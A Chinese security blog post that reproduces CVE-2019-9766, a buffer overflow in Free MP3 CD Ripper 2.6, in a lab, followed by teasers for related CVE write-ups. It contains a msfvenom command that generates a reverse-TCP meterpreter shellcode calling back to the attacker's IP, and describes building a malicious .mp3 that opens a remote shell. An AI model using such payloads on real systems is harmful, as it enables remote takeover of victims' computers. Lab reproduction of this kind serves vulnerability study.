(CVE-2019-9766)Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞复现

最新推荐文章于 2020-09-21 14:36:50 发布
原创 最新推荐文章于 2020-09-21 14:36:50 发布 · 441 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全漏洞 #安全

FreeMP3CDRipper 2.6版本存在栈缓冲区溢出漏洞,允许远程攻击者通过特制.mp3文件执行任意代码。本文介绍漏洞详情、复现步骤及修复建议。

漏洞简介:

Free MP3 CD Ripper是一款音频格式转换器。
Free MP3 CD Ripper 2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的.mp3文件利用该漏洞执行任意代码。

威胁类型

远程代码执行

威胁等级

漏洞编号

CVE-2019-9766
受影响系统及应用版本
Free MP3 CD Ripper 2.6

漏洞复现:

攻击机:kali2020 、kali2019
ip:192.168.6.146
受害机:win10
ip:192.168.6.142
安装Free MP3 CD Ripper 2.6版本

1、搭建环境

Win10下载安装Free MP3 CD Ripper 2.6版本
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用msf生成反向连接的shellcode

msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.6.146 lport = 888 -fc --smallest
在这里插入图片描述

替换脚本中的shellcode.

编写生成.Mp3文件的脚本

在这里插入图片描述

运行脚本,生成一个.MP3的文件

在这里插入图片描述
在这里插入图片描述

将生成的.mp3文件放到win10上(需要VMtools)

在这里插入图片描述

kali开启msfconsole

在这里插入图片描述

使用exploit/multi/handler模块
设置lhost,lport,攻击载荷
在这里插入图片描述

Kali开启监听:
在这里插入图片描述

Win10使用free MP3 CD ripper 打开mp3文件
在这里插入图片描述

弹回shell
在这里插入图片描述

执行命令

在这里插入图片描述

漏洞利用成功

PS:说一个我踩的坑吧,真的头一次遇到这种情况:

进攻利用攻击机需要用kali2019版本,2020版本不可以利用。用2020试了好多遍都没有成功,最后鬼使神差的用了2019就成功了。有遇到过这样的情况的大佬分享一下经验吗。

2、修复建议v

及时更新Free MP3 CD Ripper到最新版本

参考链接:https : //blog.youkuaiyun.com/weixin_46132680/article/details/104366335

[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞CVE-2019-6339)
qq_51577576的博客
02-20 988
[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞CVE-2019-6339) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞远程攻击者可利用该漏洞执行任意的php代码。
cve-2019-9766引出的缓冲区漏洞学习
zwish的信安之路
06-25 1698
通过工程实践引出的缓冲区溢出缓冲区溢出 缓冲区攻击的最终目的就是希望系统能执行这块可读写内存中已经被蓄意设定好的恶意代码。 1、栈的结构 1、先进后出。 2、在内存中表现为从高地址往低地址增长。 3、栈顶:栈的最上方(低地址区)。 4、栈低:栈的最下方(高地址区)。 基本的进程地址空间分布: 2、基本栈溢出缓冲区溢出示意图: 如果在数据段(右边的data)就保存了一系列的指令的二进制代码...
刻录制作CD光盘(Free MP3 CD Ripper) v2.6 免费版.exe
07-09
MP3 CD Ripper是一个强大的和容易的CD制作程序,它建立在一个CD抓轨和音频转换器。您可以轻易地rip音频转换您最喜爱的音频CD音轨,MP3等流行的音频格式如WAV,WMA OGG,FLAC以及APE等你可以转换你的MP3到WAV,WAV等为WMA的MP3,WAV等光盘工具允许您从远程CDDB获取CD信息。 它也支持ID3标签和声音正常化。使用内置CD播放器,可以预览CD音轨开始之前,CD抓轨过程。用简单明了的界面,你可以开始通过点击几下,即使没有阅读任何帮助。如果你正在寻找一个应用程序来帮助您翻录音频CD和音频文件转换成不同的格式,你不会失望的。
Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现
WY92139010的博客
07-02 352
Free MP3 CD Ripper_缓冲区溢出远程代码执行_CVE-2019-9766漏洞复现 一、漏洞描述 Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。 二、漏洞影响版本 Free MP3 CD Ripper 2.6 三...
CVE-2019-9766-----Free MP3 CD Ripper音频转换器漏洞复现
per_se_veran_ce的博客
08-19 978
漏洞简介 Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。 vision 2.6缓冲区中存在基于堆栈的溢出。所以我们可以为它创建一个Poc。文件类型已更改为.mp3并从远程攻击它 实验环境 攻击机:kali 192.168.168.165 目...
漏洞学习之CVE-2009-1330 Easy RM to MP3 Converter
ATree的博客
11-18 1199
最近学习了有关漏洞方面的知识,了解虽不是很深刻,但是也还算是入了坑,稍微知道点,别人在谈论时,也可以接上话了。 目标软件是Easy Rm to MP3 Converter,根据CVE上的公示可知,它的漏洞是在对.m3u音频列表文件解析出了问题,通过了解可知,.m3u文件是文本文件,这就给我们比较大的发展空间了,非常方便的构造一个这样的文件然后去触发这个漏洞产生。我们在构造这个文件时需要注
成功爬取CVE-2019-9766漏洞复现【优快云】【1】
HWP
03-14 1218
代码: import requests import bs4 from bs4 import BeautifulSoup import re ss = '' headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0...
cve-2019-0192一把梭
Yale的博客
03-26 5480
背景: 近日,Apache Solr官方团队在最新的安全更新中披露了一则Apache Solr Deserialization 远程代码执行漏洞CVE-2019-0192)。漏洞官方定级为 High,属于高危漏洞。该漏洞本质是ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。攻击者可以通过ConfigAPI将其配置指向恶意RMI服务器,利用Solr的不安全反序列化来触发...
CVE-2017-12617漏洞分析
四盘山博客
10-18 3622
CVE-2017-12617Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞CVE-2017-12617:远程代码执行漏洞。环境使用image: tomcat:7.0.79-jre8复现漏洞docker-compose
CVE-2018-9995漏洞复现
qq_39627497的博客
12-06 3251
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一...
Tomcat RCE 漏洞复现CVE-2019-0232)
大哥一声吼
04-18 1万+
漏洞影响范围,直接看官方公告: 总结起来漏洞影响范围如下: tomcat 7.0.04之前 tomcat 8.5.40之前 tomcat 9.0.19之前 版本都会影响 (tomcat 服务器版本在受影响范围内的小伙伴可以打一波补丁了) 测试环境 tomcat 版本8.5.31 jdk版本8.121 漏洞利用前提 修改conf里面的内容 第一处:con...
OpenSSH 安全漏洞(CVE-2019-6111) 欺骗安全漏洞CVE-2019-6110)欺骗安全漏洞CVE-2019-6109)解决办法
热门推荐
weixin_43103905的博客
05-07 1万+
漏洞情况 如标题三个漏洞2019年1月26日发布,发现存在该问题的设备使用的是OpenSSH 7.9版本。 三个安全漏洞问题为scp相关问题,出现在openssh-client。 解决办法: 目前发现成功解决该问题的方式是在openssh官网中找到,官网于4月26日发布最新OpenSSH 8.0版本中提到: 原引:https://www.openssh.com/txt/release-8.0 T...
CVE-2019-0232漏洞复现
whh6tl的博客
07-25 7387
漏洞简介 2019年4月10日,Apache Tomcat披露了一个漏洞漏洞编号为CVE-2019-0232,该漏洞存在于启用了enableCmdLineArguments选项的CGI Servlet中,与JRE向Windows传递参数过程中的bug有关。成功利用此漏洞可允许远程攻击者在目标服务器上执行任意命令,从而导致服务器被完全控制。由于Apache Tomcat应用范围广泛,该漏洞一旦被大规模利用,带来后果将不堪设想。 威胁类型 远程代码执行、提权; 威胁等级 高 漏洞编号 CVE-2019-023
ES文件管理器未授权访问漏洞CVE-2019-6447)
公众号shadow sock7
01-20 4142
漏洞描述 在受害者ES文件管理器启动一次后,会开放TCP端口59777作为HTTP服务器。攻击者可在没有访问控制的wifi环境下通过构造json请求,读取受害者的文件,启动受害者任意app。受害者手机无需root,攻击者也无需授权凭据。 影响范围: ES文件管理器 4.1.9.7.4 and below 经测试在root和非root手机上4.1.9.4版本ES文件管理器(http://shouji...
CVE-2019-9766漏洞复现
玄道的网安博客
09-21 554
简介 Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在缓冲区溢出漏洞远程攻击者可以借助特制的以.mp3为后缀的文件,利用该漏洞执行任意代码。 环境搭建 1.攻击机:kali ip:192.168.111.129 2.靶机:windows10 安装Free MP3 CD Ripper 2.6版本 ip:192.168.3.20 ...
深入分析CVE-2019-0708远程代码执行漏洞利用工具
CVE-2019-0708 是一个引起广泛关注的远程桌面服务漏洞,存在于远程桌面协议 (RDP) 中,该服务是 Windows 操作系统的一个组件,被用于提供远程访问和桌面共享。 CVE-2019-0708 被别名为“蓝屏”(BlueKeep),因其类似...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值